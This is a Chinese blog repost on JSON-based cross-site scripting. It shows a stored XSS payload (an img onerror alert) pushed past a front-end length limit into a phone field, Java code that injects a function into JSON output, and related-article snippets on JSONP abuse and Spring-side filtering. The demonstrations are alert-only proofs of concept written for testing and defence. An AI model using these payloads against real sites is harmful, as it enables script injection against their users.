JSON XSS

最新推荐文章于 2024-03-26 10:25:46 发布
最新推荐文章于 2024-03-26 10:25:46 发布
阅读量893 收藏
点赞数
分类专栏: web 文章标签: json xss 前端
原文链接:https://www.cnblogs.com/xiaozi/p/9929704.html
版权

JSON XSS

本文由Bypass整理发布,

文章目录


漏洞实例一:

1、在更新用户信息,修改联系电话,抓包绕过前端20个字符限制,Payload为 111<img src=1 onerror=alert(1)>

img

2、更新后,访问json

img

3、已隐去相关信息,json形式大约是这样子:

{"birthday":"1991-12-09 00:00:00","org":
    {"parent":"ae5ef78d-bd21-4e10-a03a-2707366dfb80",
    "phone":"111<img src=1 onerror=alert(1)>","createTime":"2019-01-25 09:46:30","status":1}

4、在页面找到输出点,成功弹窗。

img

案例二:

[复制代码](javascript:void(0)😉

json = new JSONObject();
json.put("code", 200);
json.put("info", "{'replace':function(){alert(/xss/);}}");
json.put("msg", "success");
System.out.println(json);
// 输出:{"code":200,"info":{"replace":function(){ alert(/xss/); }},"msg":"success"}

[复制代码](javascript:void(0)😉

参考链接:https://blog.csdn.net/l_f0rm4t3d/article/details/23851071/

本文由Bypass整理发布,转载请保留出处。 欢迎关注我的个人微信公众号:Bypass–,浏览更多精彩文章。

分类: 渗透测试

明月清风~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
防范json xss的方法 - 黑白网络
05-01
防范json xss的方法 - 黑白网络 防范json xss的方法 - 黑白网络
Springboot 防止XSS攻击,包含解决RequestBody 的Json 格式参数
热门推荐
KID5945的博客
04-27 1万+
一、前言 最近项目做安全测试,发现存在XSS攻击的可能,于是乎上网找找看,找了很多基本都是继承HttpServletRequestWrapper,对getParam、getQueryString等获取参数的方法进行重写,对参数进行html转义,马上找一个加上试了试,可是发现保存的对象还是没有转义的,后来才想到项目是前后端分离,基本都是@RequestBody注解接收application/jso......
json xss_基于JSONXSS
weixin_26722031的博客
07-30 2316
json xssBasically Cross-Site scripting is injecting the malicious code into the websites on the client-side. This vulnerability normally allows an attacker to masquerade as a victim user, to carry out...
Json XSS (只是一个小窥)
byteway的专栏
04-16 8501
大家都清楚json 类似于字典的样子吧,这里就不再赘述了,XSS直接上代码: json = new JSONObject(); json.put("code", 200); json.put("info", "{'replace':function(){alert(/xss/);}}"); json.put("msg", "success"); System.out.println(json
asp 处理json 示例
02-22
6. **安全考虑**:处理用户提供的JSON数据时,务必进行数据验证和清理,以防止潜在的跨站脚本攻击(XSS)或SQL注入等安全问题。 7. **异步通信**:在ASP中处理JSON常与AJAX(Asynchronous JavaScript and XML)结合...
json测试用例
01-30
9. **安全性**:在传输和存储JSON数据时,需要考虑安全性问题,如防止XSS攻击(通过JSON注入恶意脚本)和CSRF攻击(跨站请求伪造)。 在"onlineDataSourceFile.json"这个文件中,我们可以假设它包含了某种在线数据...
JSON.zip_JSON
09-24
6. 安全性问题:讨论处理JSON数据时的安全考虑,如XSS和CSRF攻击。 7. 实例分析:通过实际的例子展示JSON的使用,包括复杂的数据结构和实际应用案例。 8. 工具与调试:介绍JSON相关的在线工具,如在线解析器、格式化...
JSON(回顾)
喜大普奔
10-26 717
JSON(回顾)
Spring过滤json中的XSS
学医救不了中国人
10-24 6428
spring处理json是通过MappingJackson2HttpMessageConverter实现的。 而MappingJackson2HttpMessageConverter中的read()和writeInternal()分别对应json的请求和响应。 也就是说我们的过滤工作就这两个方法中展开。 writeInternal首先创建一个类并继承MappingJackson2HttpMessa...
jsonp安全攻防技术(JSON劫持、XSS漏洞)
tiancityycf的专栏
06-07 3084
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script> 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): {"id":"1","name":"名字"} 那么他们可以首先通过 JSONP 的“ Padding...
一次批量挖掘时获取到的接口用以分析jsonp以及xss漏洞挖掘分析
goddemon
05-02 576
前言: 因为一直在捣鼓批量挖掘 在测批量挖掘的一个思路时,跑了某个小游戏的域名 跑出来这个接口觉得这个接口拿来当例子复现是个很不错的选择 正文 获取到如下的接口 http://网站/api/position/615?callback=111 发觉是一个很不错的例子 这里就直接用这个来简单的教大家怎么挖掘jsonp的漏洞和xss进阶钓鱼使用 xss基础的使用就不说了 最基础的 当然也是因为这里没waf 如果有waf的话就想办法绕就好了 waf还是蛮好绕的 这里肯定是核心写进阶利用的 jsonp 核心利用的
【快学SpringBoot】过滤XSS脚本攻击(包括json格式)
weixin_33845881的博客
06-17 1798
XSS攻击是什么 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 简而言之,就是作恶用户通过表单提交一些前端代码,如果不做处理的话,这些前端代码将会在展示的时候被浏览器执行。 如何避免XSS攻击 ...
跨域方法总结
杨森源的博客
12-03 2663
最近面试问的挺多的一个问题,就是JavaScript的跨域问题。在这里,对跨域的一些方法做个总结。由于浏览器的同源策略,不同域名、不同端口、不同协议都会构成跨域;但在实际的业务中,很多场景需要进行跨域传递信息,这样就催生出多种跨域方法。具备src的标签 原理:所有具有src属性的HTML标签都是可以跨域的 在浏览器中,<script>、<img>、<iframe>和<link>这几个标签是可以加载跨
Java防止Xss注入json_【知识点】6个XSS的防御小技巧
weixin_39580041的博客
11-20 480
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。作者:la...
使用antixss,安全的json也被过滤了,可以改写格式,将前段传过来的json转换成json字符串即可
最新发布
weixin_50592059的博客
03-26 177
被过滤改成字符串后不过滤。
彻底解决spring mvc XSS漏洞问题(包括json的格式的入参和出参)
3月3的风筝
05-07 9088
目录 一,背景 二,名词解释 三,xss修复的一般处理方法 四、扩展jackson定制自己的objectMapper处理json出入参的转义 五、结语 一,背景 昨天收到公司安全部的一封漏洞邮件,说系统注册存在xss存储型漏洞,然后看了一下系统中是有xssFilter处理xss漏洞的,但是注册页面xss注入的却没有处理,经过分析代码和网上查找资料,xssFilter只能处理get请求...
对 Spring 中的 @RequestBody json 请求数据做 XSS 过滤
【欢迎关注公众号:冬瓜白】
11-17 2835
关于xss过滤,网上大都是是对 param的,这个很多文章了 定义过滤器。XSSFilter 不说了, 参考 https://blog.csdn.net/yucaifu1989/article/details/61616554 还有就是对所有@ResponseBody 返回内容做XSS过滤的方案: MappingJackson2HttpMessageConverter 的objectMapper 做设置 参考 百度 那么对 @RequestBody 的 json 数据怎么过滤呢: spring处
json格式xss漏洞的方法
04-29
JSON 格式的 XSS 漏洞,是指攻击者利用前端服务返回的 JSON 格式数据,在页面中成功注入恶意代码实现攻击的一种方式。 攻击方法主要有两种: 1. 直接注入 攻击者在 JSON 格式的数据中,掺杂恶意代码,例如: ``` { "name": "张三", "age": "<script>alert('XSS攻击')</script>" } ``` 当服务端返回这段 JSON 数据,渲染到前端页面使用时,恶意代码会被成功执行。 2. 利用 JSONP JSONP 是一种跨域请求的解决方案,其利用 script 标签可以跨域加载 JavaScript 的特性,但同时也引发了一些安全问题。 攻击者可以通过 JSONP 发送一个请求,将自己的恶意代码作为回调函数的参数传递过来。例如: ``` <script src="http://www.targetwebsite.com/getData?callback=evilFunc"></script> <script> function evilFunc(data) { // 执行恶意代码 } </script> ``` 当服务端返回的数据是这样的形式,就会导致恶意代码被执行。 为了防止这种攻击,我们可以采取以下措施: 1. 对从服务端返回的 JSON 数据进行过滤和校验。 2. 禁止使用 eval 函数,将 JSON 数据转换成 JavaScript 对象时,使用 JSON.parse 函数。 3. 采用 CSP 策略,限制页面中能够执行的脚本类型。 4. 避免使用 JSONP 跨域请求。如果使用了 JSONP,应该对返回的数据进行过滤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值